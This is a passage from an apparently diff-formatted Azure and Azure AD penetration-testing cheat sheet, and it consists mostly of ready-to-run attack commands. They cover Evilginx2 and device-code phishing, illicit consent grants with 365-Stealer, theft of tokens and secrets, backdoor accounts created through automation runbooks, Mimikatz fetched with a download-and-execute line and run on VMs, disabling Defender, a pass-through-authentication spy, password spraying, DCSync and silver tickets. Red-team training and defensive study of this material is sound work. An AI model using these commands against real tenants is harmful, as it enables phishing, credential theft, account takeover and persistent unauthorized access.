Az> Get-AzKeyVault +``` + +## Phishing with Evilginx2 + +```powershell +PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets +: config domain username.corp +: config ip 10.10.10.10 +: phishlets hostname o365 login.username.corp +: phishlets get-hosts o365 + +Create a DNS entry for login.login.username.corp and www.login.username.corp, type A, pointing to your machine + +# copy certificate and enable the phishing +PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\ca.crt C:\Users\Username\.evilginx\crt\login.username.corp\o365.crt +PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\private.key C:\Users\Username\.evilginx\crt\login.username.corp\o365.key +: phishlets enable o365 + +# get the phishing URL +: lures create o365 +: lures get-url 0 +``` + +## Illicit Consent Grant + +> The attacker creates an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting consent to the application so that the attacker can gain access to the data that the target user has access to. + +Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMSAuthorizationPolicy).PermissionGrantPolicyIdsAssignedToDefaultUserRole` +* **Disable user consent** : Users cannot grant permissions to applications. +* **Users can consent to apps from verified publishers or your organization, but only for permissions you select** : All users can only consent to apps that were published by a verified publisher and apps that are registered in your tenant +* **Users can consent to all apps** : allows all users to consent to any permission which doesn't require admin consent, +* **Custom app consent policy** + +### Register Application + +1. Login to https://portal.azure.com > Azure Active Directory +2. Click on **App registrations** > **New registration** +3. Enter the Name for our application +4. Under support account types select **"Accounts in any organizational directory (Any Azure AD directory - Multitenant)"** +5. Enter the Redirect URL. This URL should be pointed towards our 365-Stealer application that we will host for hosting our phishing page. Make sure the endpoint is `https://:/login/authorized`. +6. Click **Register** and save the **Application ID** + +### Configure Application + +1. Click on `Certificates & secrets` +2. Click on `New client secret` then enter the **Description** and click on **Add**. +3. Save the **secret**'s value. +4. Click on API permissions > Add a permission +5. Click on Microsoft Graph > **Delegated permissions** +6. Search and select the below mentioned permissions and click on Add permission + * Contacts.Read + * Mail.Read / Mail.ReadWrite + * Mail.Send + * Notes.Read.All + * Mailboxsettings.ReadWrite + * Files.ReadWrite.All + * User.ReadBasic.All + * User.Read + +### Setup 365-Stealer (Deprecated) + +:warning: Default port for 365-Stealer phishing is 443 + +- Run XAMPP and start Apache +- Clone 365-Stealer into `C:\xampp\htdocs\` + * `git clone https://github.com/AlteredSecurity/365-Stealer.git` +- Install the requirements + * Python3 + * PHP CLI or Xampp server + * `pip install -r requirements.txt` +- Enable sqlite3 (Xampp > Apache config > php.ini) and restart Apache +- Edit `C:/xampp/htdocs/yourvictims/index.php` if needed + - Disable IP whitelisting `$enableIpWhiteList = false;` +- Go to 365-Stealer Management portal > Configuration (http://localhost:82/365-stealer/yourVictims) + - **Client Id** (Mandatory): This will be the Application(Client) Id of the application that we registered. + - **Client Secret** (Mandatory): Secret value from the Certificates & secrets tab that we created. + - **Redirect URL** (Mandatory): Specify the redirect URL that we entered during registering the App like `https:///login/authorized` + - **Macros Location**: Path of macro file that we want to inject. + - **Extension in OneDrive**: We can provide file extensions that we want to download from the victims account or provide `*` to download all the files present in the victims OneDrive. The file extensions should be comma separated like txt, pdf, docx etc. + - **Delay**: Delay the request by specifying time in seconds while stealing +- Create a Self Signed Certificate to use HTTPS +- Run the application either click on the button or run this command : `python 365-Stealer.py --run-app` + - `--no-ssl`: disable HTTPS + - `--port`: change the default listening port + - `--token`: provide a specific token + - `--refresh-token XXX --client-id YYY --client-secret ZZZ`: use a refresh token +- Find the Phishing URL: go to `https://:` and click on **Read More** button or in the console. + +### Setup Vajra + +> Vajra is a UI-based tool with multiple techniques for attacking and enumerating in the target's Azure environment. It features an intuitive web-based user interface built with the Python Flask module for a better user experience. The primary focus of this tool is to have different attacking techniques all at one place with web UI interfaces. - https://github.com/TROUBLE-1/Vajra + +**Mitigation**: Enable `Do not allow user consent` for applications in the "Consent and permissions menu". + + +## Device Code Phish + +Requirements: +* Azure AD / Office 365 E3 Subscription + +Exploitation: + +* Import TokenTactics: `PS C:\TokenTactics> Import-Module .\TokenTactics.psd1` +* Request a device code for the Azure Graph API using TokenTactics: `Get-AzureToken -Client Graph` +* Replace `` in the [phishing email](https://github.com/rvrsh3ll/TokenTactics/blob/main/resources/DeviceCodePhishingEmailTemplate.oft) +* Leave TokenTactics running in the PowerShell window and send the phishing email +* Targeted user will follow the link to https://microsoft.com/devicelogin and complete the Device Code form +* Enjoy your **Access Token** & **Refresh Token** + + +## Token from Managed Identity + +> **MSI_ENDPOINT** is an alias for **IDENTITY_ENDPOINT**, and **MSI_SECRET** is an alias for **IDENTITY_HEADER**. + +Find IDENTITY_HEADER and IDENTITY_ENDPOINT from the environment : `env` + +Most of the time, you want a token for one of these resources: +* https://storage.azure.com +* https://vault.azure.net +* https://graph.microsoft.com +* https://management.azure.com + + +### Azure API via Powershell + +Get **access_token** from **IDENTITY_HEADER** and **IDENTITY_ENDPOINT**: `system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');`. + +Then query the Azure REST API to get the **subscription ID** and more . + +```powershell +$Token = 'eyJ0eX..' +$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01' +# $URI = 'https://graph.microsoft.com/v1.0/applications' +$RequestParams = @{ + Method = 'GET' + Uri = $URI + Headers = @{ + 'Authorization' = "Bearer $Token" + } +} +(Invoke-RestMethod @RequestParams).value + +# List resources and check for runCommand privileges +$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01' +$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups//providers/Microsoft.Compute/virtualMachines/ func.HttpResponse: + logging.info('Python HTTP trigger function processed a request.') + IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT'] + IDENTITY_HEADER = os.environ['IDENTITY_HEADER'] + cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER) + val = os.popen(cmd).read() + return func.HttpResponse(val, status_code=200) +``` + + +### Get Tokens + +:warning: The lifetime of a Primary Refresh Token is 14 days! + +```powershell +# az cli - get tokens +az account get-access-token +az account get-access-token --resource-type aad-graph +# or Az +(Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token +# or from a managed identity using IDENTITY_HEADER and IDENTITY_ENDPOINT +``` + +### Use Tokens + +> Tokens contain all the claims including that for MFA and Conditional Access + +* Az Powershell + ```powershell + PS C:\Tools> $token = 'eyJ0e..' + PS C:\Tools> Connect-AzAccount -AccessToken $token -AccountId + + # Access Token and Graph Token + PS C:\Tools> $token = 'eyJ0eX..' + PS C:\Tools> $graphaccesstoken = 'eyJ0eX..' + PS C:\Tools> Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId + PS C:\Tools> Get-AzResource + # ERROR: 'this.Client.SubscriptionId' cannot be null. + # ---> The managed identity has no rights on any of the Azure resources. Switch to to GraphAPI + ``` +* AzureAD + ```powershell + Import-Module C:\Tools\AzureAD\AzureAD.psd1 + $AADToken = 'eyJ0…' + Connect-AzureAD -AadAccessToken $AADToken -TenantId -AccountId + ``` + +### Refresh Tokens + +* https://github.com/ConstantinT/Lantern + ```powershell + Lantern.exe cookie --derivedkey --context --prt + Lantern.exe mdm --joindevice --accesstoken (or some combination from the token part) --devicename --outpfxfile + Lantern.exe token --username --password + Lantern.exe token --refreshtoken + Lantern.exe devicekeys --pfxpath XXXX.pfx --refreshtoken (--prtcookie / ---username + --password ) + ``` +* https://github.com/rvrsh3ll/TokenTactics + ```powershell + Import-Module .\TokenTactics.psd1 + CommandType Name Version Source + ----------- ---- ------- ------ + Function Clear-Token 0.0.1 TokenTactics + Function Dump-OWAMailboxViaMSGraphApi 0.0.1 TokenTactics + Function Forge-UserAgent 0.0.1 TokenTactics + Function Get-AzureToken 0.0.1 TokenTactics + Function Get-TenantID 0.0.1 TokenTactics + Function Open-OWAMailboxInBrowser 0.0.1 TokenTactics + Function Parse-JWTtoken 0.0.1 TokenTactics + Function RefreshTo-AzureCoreManagementToken 0.0.1 TokenTactics + Function RefreshTo-AzureManagementToken 0.0.1 TokenTactics + Function RefreshTo-DODMSGraphToken 0.0.1 TokenTactics + Function RefreshTo-GraphToken 0.0.1 TokenTactics + Function RefreshTo-MAMToken 0.0.1 TokenTactics + Function RefreshTo-MSGraphToken 0.0.1 TokenTactics + Function RefreshTo-MSManageToken 0.0.1 TokenTactics + Function RefreshTo-MSTeamsToken 0.0.1 TokenTactics + Function RefreshTo-O365SuiteUXToken 0.0.1 TokenTactics + Function RefreshTo-OfficeAppsToken 0.0.1 TokenTactics + Function RefreshTo-OfficeManagementToken 0.0.1 TokenTactics + Function RefreshTo-OutlookToken 0.0.1 TokenTactics + Function RefreshTo-SubstrateToken 0.0.1 TokenTactics + ``` + +## Stealing Tokens + +* Get-AzurePasswords + ```powershell + Import-Module Microburst.psm1 + Get-AzurePasswords + Get-AzurePasswords -Verbose | Out-GridView + ``` + +### Stealing tokens from az cli + +* az cli stores access tokens in clear text in **accessTokens.json** in the directory `C:\Users\\.Azure` +* azureProfile.json in the same directory contains information about subscriptions. + +### Stealing tokens from az powershell + +* Az PowerShell stores access tokens in clear text in **TokenCache.dat** in the directory `C:\Users\\.Azure` +* It also stores **ServicePrincipalSecret** in clear-text in **AzureRmContext.json** +* Users can save tokens using `Save-AzContext` + + +## Add credentials to all Enterprise Applications + +```powershell +# Add secrets +PS > . C:\Tools\Add-AzADAppSecret.ps1 +PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose + +# Use secrets to authenticate as Service Principal +PS > $password = ConvertTo-SecureString '' -AsPlainText -Force +PS > $creds = New-Object System.Management.Automation.PSCredential('', $password) +PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '' +``` + +## Spawn SSH for Azure Web App + +```powershell +az webapp create-remote-connection --subscription --resource-group -n +``` + +## Azure Storage Blob + +* Blobs - `*.blob.core.windows.net` +* File Services - `*.file.core.windows.net` +* Data Tables - `*.table.core.windows.net` +* Queues - `*.queue.core.windows.net` + +### Enumerate blobs + +```powershell +PS > . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureBlobs.ps1 +PS > Invoke-EnumerateAzureBlobs -Base -OutputFile azureblobs.txt +Found Storage Account - testsecure.blob.core.windows.net +Found Storage Account - securetest.blob.core.windows.net +Found Storage Account - securedata.blob.core.windows.net +Found Storage Account - securefiles.blob.core.windows.net +``` + +### SAS URL + +* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/) +* Click on **Open Connect Dialog** in the left menu. +* Select **Blob container**. +* On the **Select Authentication Method** page + * Select **Shared access signature (SAS)** and click on Next + * Copy the URL in **Blob container SAS URL** field. + +:warning: You can also use `subscription`(username/password) to access storage resources such as blobs and files. + +### List and download blobs + +```powershell +PS Az> Get-AzResource +PS Az> Get-AzStorageAccount -name -ResourceGroupName +PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name -ResourceGroupName ).context +PS Az> Get-AzStorageBlobContent -Container -Context (Get-AzStorageAccount -name -ResourceGroupName ).context -Blob +``` + +## Runbook Automation + +### Create a Runbook + +```powershell +# Check user right for automation +az extension add --upgrade -n automation +az automation account list # if it doesn't return anything the user is not a part of an Automation group +az ad signed-in-user list-owned-objects + +# If the user is not part of an "Automation" group. +# Add him to a custom group , e.g: "Automation Admins" +Add-AzureADGroupMember -ObjectId -RefObjectId -Verbose + +# Get the role of a user on the Automation account +# Contributor or higher = Can create and execute Runbooks +Get-AzRoleAssignment -Scope /subscriptions//resourceGroups//providers/Microsoft.Automation/automationAccounts/ + +# List hybrid workers +Get-AzAutomationHybridWorkerGroup -AutomationAccountName -ResourceGroupName + +# Create a Powershell Runbook +PS C:\Tools> Import-AzAutomationRunbook -Name -Path C:\Tools\username.ps1 -AutomationAccountName -ResourceGroupName -Type PowerShell -Force -Verbose + +# Publish the Runbook +Publish-AzAutomationRunbook -RunbookName -AutomationAccountName -ResourceGroupName -Verbose + +# Start the Runbook +Start-AzAutomationRunbook -RunbookName -RunOn Workergroup1 -AutomationAccountName -ResourceGroupName -Verbose +``` + +### Persistence via Automation accounts + +* Create a new Automation Account + * "Create Azure Run As account": Yes +* Import a new runbook that creates an AzureAD user with Owner permissions for the subscription* + * Sample runbook for this Blog located here – https://github.com/NetSPI/MicroBurst + * Publish the runbook + * Add a webhook to the runbook +* Add the AzureAD module to the Automation account + * Update the Azure Automation Modules +* Assign "User Administrator" and "Subscription Owner" rights to the automation account +* Eventually lose your access… +* Trigger the webhook with a post request to create the new user + ```powershell + $uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d" + $AccountInfo = @(@{RequestBody=@{Username="BackdoorUsername";Password="BackdoorPassword"}}) + $body = ConvertTo-Json -InputObject $AccountInfo + $response = Invoke-WebRequest -Method Post -Uri $uri -Body $body + ``` + + +## Virtual Machine RunCommand + +Requirements: +* `Microsoft.Compute/virtualMachines/runCommand/action` + +```powershell +# Get Public IP of VM : query the network interface +PS AzureAD> Get-AzVM -Name -ResourceGroupName | select -ExpandProperty NetworkProfile +PS AzureAD> Get-AzNetworkInterface -Name +PS AzureAD> Get-AzPublicIpAddress -Name + +# Execute Powershell script on the VM +PS AzureAD> Invoke-AzVMRunCommand -VMName -ResourceGroupName -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Tools\adduser.ps1' -Verbose + +# Connect via WinRM +PS C:\Tools> $password = ConvertTo-SecureString '' -AsPlainText -Force +PS C:\Tools> $creds = New-Object System.Management.Automation.PSCredential('username', $Password) +PS C:\Tools> $sess = New-PSSession -ComputerName -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer) +PS C:\Tools> Enter-PSSession $sess +``` + +> Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as NT Authority\System + +```powershell +# List available VMs +PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name +ResourceGroupName Name +----------------- ---- +TESTRESOURCES Remote-Test + +# Execute Powershell script on the VM +PS C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1 +``` + +Against the whole subscription using MicroBurst.ps1 + +```powershell +Import-module MicroBurst.psm1 +Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt +``` + + +## KeyVault Secrets + +```powershell +# keyvault access token +curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER +curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER + +# connect +PS> $token = 'eyJ0..' +PS> $keyvaulttoken = 'eyJ0..' +PS Az> Connect-AzAccount -AccessToken $token -AccountId 2e91a4fea0f2-46ee-8214-fa2ff6aa9abc -KeyVaultAccessToken $keyvaulttoken + +# query the vault and the secrets +PS Az> Get-AzKeyVault +PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault +PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name Reader -AsPlainText +``` + +## Pass The PRT + +> MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joined machines for lateral movement attacks via the Primary Refresh Token (PRT) which is used for Azure AD SSO (single sign-on). + +```powershell +# Run mimikatz to obtain the PRT +PS> iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1") +PS> Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"' + +# Copy the PRT and KeyValue +Mimikatz> privilege::debug +Mimikatz> token::elevate +Mimikatz> dpapi::cloudapkd /keyvalue: /unprotect + +# Copy the Context, ClearKey and DerivedKey +Mimikatz> dpapi::cloudapkd /context: /derivedkey: /Prt: +``` + +```powershell +# Generate a JWT +PS> Import-Module C:\Tools\AADInternals\AADInternals.psd1 +PS AADInternals> $PRT_OF_USER = '...' +PS AADInternals> while($PRT_OF_USER.Length % 4) {$PRT_OF_USER += "="} +PS AADInternals> $PRT = [text.encoding]::UTF8.GetString([convert]::FromBase64String($PRT_OF_USER)) +PS AADInternals> $ClearKey = "XXYYZZ..." +PS AADInternals> $SKey = [convert]::ToBase64String( [byte[]] ($ClearKey -replace '..', '0x$&,' -split ',' -ne '')) +PS AADInternals> New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey –GetNonce +eyJ0eXAiOiJKV1QiL... +``` + +The `` (JSON Web Token) can be used as PRT cookie in a (anonymous) browser session for https://login.microsoftonline.com/login.srf. +Edit the Chrome cookie (F12) -> Application -> Cookies with the values: + +```powershell +Name: x-ms-RefreshTokenCredential +Value: +HttpOnly: √ +``` + +:warning: Mark the cookie with the flags `HTTPOnly` and `Secure`. + + +## Pass The Certificate + +```ps1 +Copy-Item -ToSession $jumpvm -Path C:\Tools\PrtToCertmaster.zip -Destination C:\Users\Username\Documents\username –Verbose +Expand-Archive -Path C:\Users\Username\Documents\username\PrtToCert-master.zip -DestinationPath C:\Users\Username\Documents\username\PrtToCert + +# Require the PRT, TenantID, Context and DerivedKey +& 'C:\Program Files\Python39\python.exe' C:\Users\Username\Documents\username\PrtToCert\RequestCert.py --tenantId --prt --userName @.onmicrosoft.com --hexCtx --hexDerivedKey +# PFX saved with the name @.onmicrosoft.com.pfx and password AzureADCert +``` + +Python tool that will authenticate to the remote machine, run PSEXEC and open a CMD on the victim machine + +https://github.com/morRubin/AzureADJoinedMachinePTC + +```ps1 +Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP +Main.py --usercert "admin.pfx" --certpass password --remoteip 10.10.10.10 + +python Main.py --usercert C:\Users\Username\Documents\username\@.onmicrosoft.com.pfx -- +certpass AzureADCert --remoteip 10.10.10.10 --command "cmd.exe /c net user username Password@123 /add /Y && net localgroup administrators username /add" +``` + +## Intunes Administration + +Requirements: +* **Global Administrator** or **Intune Administrator** Privilege : `Get-AzureADGroup -Filter "DisplayName eq 'Intune Administrators'"` + +1. Login into https://endpoint.microsoft.com/#home or use Pass-The-PRT +2. Go to **Devices** -> **All Devices** to check devices enrolled to Intune +3. Go to **Scripts** and click on **Add** for Windows 10. +4. Add a **Powershell script** +5. Specify **Add all users** and **Add all devices** in the **Assignments** page. + +:warning: It will take up to one hour before you script is executed ! + + + +## Dynamic Group Membership + +Get groups that allow Dynamic membership: `Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}` + +Rule example : `(user.otherMails -any (_ -contains "vendor")) -and (user.userType -eq "guest")` +Rule description: Any Guest user whose secondary email contains the string 'vendor' will be added to the group + +1. Open user's profile, click on **Manage** +2. Click on **Resend** invite and to get an invitation URL +3. Set the secondary email + ```powershell + PS> Set-AzureADUser -ObjectId -OtherMails @.onmicrosoft.com -Verbose + ``` + +## Administrative Unit + +> Administrative Unit can reset password of another user + +```powershell +PS AzureAD> Get-AzureADMSAdministrativeUnit -Id +PS AzureAD> Get-AzureADMSAdministrativeUnitMember -Id +PS AzureAD> Get-AzureADMSScopedRoleMembership -Id | fl +PS AzureAD> Get-AzureADDirectoryRole -ObjectId +PS AzureAD> Get-AzureADUser -ObjectId | fl +PS C:\Tools> $password = "Password" | ConvertToSecureString -AsPlainText -Force +PS C:\Tools> (Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "@.onmicrosoft.com"}).ObjectId | SetAzureADUserPassword -Password $Password -Verbose +``` + +## Deployment Template + +```powershell +PS Az> Get-AzResourceGroup +PS Az> Get-AzResourceGroupDeployment -ResourceGroupName SAP + +# Export +PS Az> Save-AzResourceGroupDeploymentTemplate -ResourceGroupName -DeploymentName +cat .json # search for hardcoded password +cat | Select-String password +``` + +## Application Proxy + +```powershell +# Enumerate application that have Proxy +PS C:\Tools> Get-AzureADApplication -All $true | %{try{GetAzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}} +PS C:\Tools> Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Finance Management System"} +PS C:\Tools> . C:\Tools\GetApplicationProxyAssignedUsersAndGroups.ps1 +PS C:\Tools> Get-ApplicationProxyAssignedUsersAndGroups -ObjectId +``` + +## Application Endpoint +```powershell +# Enumerate possible endpoints for applications starting/ending with PREFIX +PS C:\Tools> Get-AzureADServicePrincipal -All $true -Filter "startswith(displayName,'PREFIX')" | % {$_.ReplyUrls} +PS C:\Tools> Get-AzureADApplication -All $true -Filter "endswith(displayName,'PREFIX')" | Select-Object ReplyUrls,WwwHomePage,HomePage +``` + +## Conditional Access + +* Bypassing conditional access by copying User-Agent (Chrome Dev Tool > Select iPad Pro, etc) +* Bypassing conditional access by faking device compliance + ```powershell + # AAD Internals - Making your device compliant + # Get an access token for AAD join and save to cache + Get-AADIntAccessTokenForAADJoin -SaveToCache + # Join the device to Azure AD + Join-AADIntDeviceToAzureAD -DeviceName "SixByFour" -DeviceType "Commodore" -OSVersion "C64" + # Marking device compliant - option 1: Registering device to Intune + # Get an access token for Intune MDM and save to cache (prompts for credentials) + Get-AADIntAccessTokenForIntuneMDM -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -SaveToCache + # Join the device to Intune + Join-AADIntDeviceToIntune -DeviceName "SixByFour" + # Start the call back + Start-AADIntDeviceIntuneCallback -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx -DeviceName "SixByFour" + ``` + + +## Azure AD + +With Microsoft, if you are using any cloud services (Office 365, Exchange Online, etc) with Active Directory (on-prem or in Azure) then an attacker is one credential away from being able to leak your entire Active Directory structure thanks to Azure AD. + +1. Authenticate to your webmail portal (i.e. https://webmail.domain.com/) +2. Change your browser URL to: https://azure.microsoft.com/ +3. Pick the account from the active sessions +4. Select Azure Active Directory and enjoy! + +### Azure AD vs Active Directory + +| Active Directory | Azure AD | +|---|---| +| LDAP | REST API'S | +| NTLM/Kerberos | OAuth/SAML/OpenID | +| Structured directory (OU tree) | Flat structure | +| GPO | No GPO's | +| Super fine-tuned access controls | Predefined roles | +| Domain/forest | Tenant | +| Trusts | Guests | + +* Password Hash Syncronization (PHS) + * Passwords from on-premise AD are sent to the cloud + * Use replication via a service account created by AD Connect +* Pass Through Authentication (PTA) + * Possible to perform DLL injection into the PTA agent and intercept authentication requests: credentials in clear-text +* Connect Windows Server AD to Azure AD using Federation Server (ADFS) + * Dir-Sync : Handled by on-premise Windows Server AD, sync username/password + + +* Azure AD Joined : https://pbs.twimg.com/media/EQZv62NWAAEQ8wE?format=jpg&name=large +* Workplace Joined : https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large +* Hybrid Joined : https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large +* Workplace joined on AADJ or Hybrid : https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large + +### Password Spray + +> Default lockout policy of 10 failed attempts, locking out an account for 60 seconds + +```powershell +git clone https://github.com/dafthack/MSOLSpray +Import-Module .\MSOLSpray.ps1 +Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020 +Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme! + +# UserList - UserList file filled with usernames one-per-line in the format "user@domain.com" +# Password - A single password that will be used to perform the password spray. +# OutFile - A file to output valid results to. +# Force - Forces the spray to continue and not stop when multiple account lockouts are detected. +# URL - The URL to spray against. Potentially useful if pointing at an API Gateway URL generated with something like FireProx to randomize the IP address you are authenticating from. +``` + +### Convert GUID to SID + +The user's AAD id is translated to SID by concatenating `"S-1–12–1-"` to the decimal representation of each section of the AAD Id. + +```powershell +GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)] +SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)] +``` + +For example, the representation of `6aa89ecb-1f8f-4d92–810d-b0dce30b6c82` is `S-1–12–1–1789435595–1301421967–3702525313–2188119011` + +## Azure AD Connect + +Check if Azure AD Connect is installed : `Get-ADSyncConnector` + +* For **PHS**, we can extract the credentials +* For **PTA**, we can install the agent +* For **Federation**, we can extract the certificate from ADFS server using DA + +```powershell +PS > Set-MpPreference -DisableRealtimeMonitoring $true +PS > Copy-Item -ToSession $adcnct -Path C:\Tools\AADInternals.0.4.5.zip -Destination C:\Users\Administrator\Documents +PS > Expand-Archive C:\Users\Administrator\Documents\AADInternals.0.4.5.zip -DestinationPath C:\Users\Administrator\Documents\AADInternals +PS > Import-Module C:\Users\Administrator\Documents\AADInternals\AADInternals.psd1 +PS > Get-AADIntSyncCredentials + +# Get Token for SYNC account and reset on-prem admin password +PS > $passwd = ConvertToSecureString 'password' -AsPlainText -Force +PS > $creds = New-Object System.Management.Automation.PSCredential ("@.onmicrosoft.com", $passwd) +PS > GetAADIntAccessTokenForAADGraph -Credentials $creds –SaveToCache +PS > Get-AADIntUser -UserPrincipalName onpremadmin@defcorpsecure.onmicrosoft.com | select ImmutableId +PS > Set-AADIntUserPassword -SourceAnchor "" -Password "Password" -Verbose +``` + +1. Check if PTA is installed : `Get-Command -Module PassthroughAuthPSModule` +2. Install a PTA Backdoor + ```powershell + PS AADInternals> Install-AADIntPTASpy + PS AADInternals> Get-AADIntPTASpyLog -DecodePasswords + ``` + + +### Azure AD Connect - Password extraction + +Credentials in AD Sync : C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf + +Tool | Requires code execution on target | DLL dependencies | Requires MSSQL locally | Requires python locally +--- | --- | --- | --- | --- +ADSyncDecrypt | Yes | Yes | No | No +ADSyncGather | Yes | No | No | Yes +ADSyncQuery | No (network RPC calls only) | No | Yes | Yes + + +```powershell +git clone https://github.com/fox-it/adconnectdump +# DCSync with AD Sync account +``` + +### Azure AD Connect - MSOL Account's password and DCSync + +You can perform **DCSync** attack using the MSOL account. + +Requirements: + * Compromise a server with Azure AD Connect service + * Access to ADSyncAdmins or local Administrators groups + +Use the script **azuread_decrypt_msol.ps1** from @xpn to recover the decrypted password for the MSOL account: +* `azuread_decrypt_msol.ps1`: AD Connect Sync Credential Extract POC https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545 +* `azuread_decrypt_msol_v2.ps1`: Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c + +Now you can use the retrieved credentials for the MSOL Account to launch a DCSync attack. + + +### Azure AD Connect - Seamless Single Sign On Silver Ticket + +> Anyone who can edit properties of the AZUREADSSOACCS$ account can impersonate any user in Azure AD using Kerberos (if no MFA) + +> Seamless SSO is supported by both PHS and PTA. If seamless SSO is enabled, a computer account **AZUREADSSOC** is created in the on-prem AD. + +:warning: The password of the AZUREADSSOACC account never changes. + +Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsoftazuread-sso.com/) to convert Kerberos tickets to SAML and JWT for Office 365 & Azure + +1. NTLM password hash of the AZUREADSSOACC account, e.g. `f9969e088b2c13d93833d0ce436c76dd`. + ```powershell + mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit + ``` +2. AAD logon name of the user we want to impersonate, e.g. `elrond@contoso.com`. This is typically either his userPrincipalName or mail attribute from the on-prem AD. +3. SID of the user we want to impersonate, e.g. `S-1-5-21-2121516926-2695913149-3163778339-1234`. +4. Create the Silver Ticket and inject it into Kerberos cache: + ```powershell + mimikatz.exe "kerberos::golden /user:elrond + /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 + /domain:contoso.local /rc4:f9969e088b2c13d93833d0ce436c76dd + /target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit + ``` +5. Launch Mozilla Firefox +6. Go to about:config and set the `network.negotiate-auth.trusted-uris preference` to value `https://aadg.windows.net.nsatc.net,https://autologon.microsoftazuread-sso.com` +7. Navigate to any web application that is integrated with our AAD domain. Fill in the user name, while leaving the password field empty. + + +## References + +* [Introduction To 365-Stealer - Understanding and Executing the Illicit Consent Grant Attack](https://www.alteredsecurity.com/post/introduction-to-365-stealer) +* [Learn with @trouble1_raunak: Cloud Pentesting - Azure (Illicit Consent Grant Attack) !!](https://www.youtube.com/watch?v=51FSvndgddk&list=WL) +* [Pass-the-PRT attack and detection by Microsoft Defender for … - Derk van der Woude - Jun 9](https://derkvanderwoude.medium.com/pass-the-prt-attack-and-detection-by-microsoft-defender-for-afd7dbe83c94) +* [Azure AD Pass The Certificate - Mor - Aug 19, 2020](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597) +* [Get Access Tokens for Managed Service Identity on Azure App Service](https://zhiliaxu.github.io/app-service-managed-identity.html) +* [Bypassing conditional access by faking device compliance - September 06, 2020 - @DrAzureAD](https://o365blog.com/post/mdm/) +* [CARTP-cheatsheet - Azure AD cheatsheet for the CARTP course](https://github.com/0xJs/CARTP-cheatsheet/blob/main/Authenticated-enumeration.md) +* [Get-AzurePasswords: A Tool for Dumping Credentials from Azure Subscriptions - August 28, 2018 - Karl Fosaaen](https://www.netspi.com/blog/technical/cloud-penetration-testing/get-azurepasswords/) +* [An introduction to penetration testing Azure - Akimbocore](https://akimbocore.com/article/introduction-to-pentesting-azure/) +* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/) +* [Attacking Azure Cloud shell - Netspi](https://blog.netspi.com/attacking-azure-cloud-shell/) +* [Maintaining Azure Persistence via automation accounts - Netspi](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/) +* [Detecting an attacks on active directory with Azure - 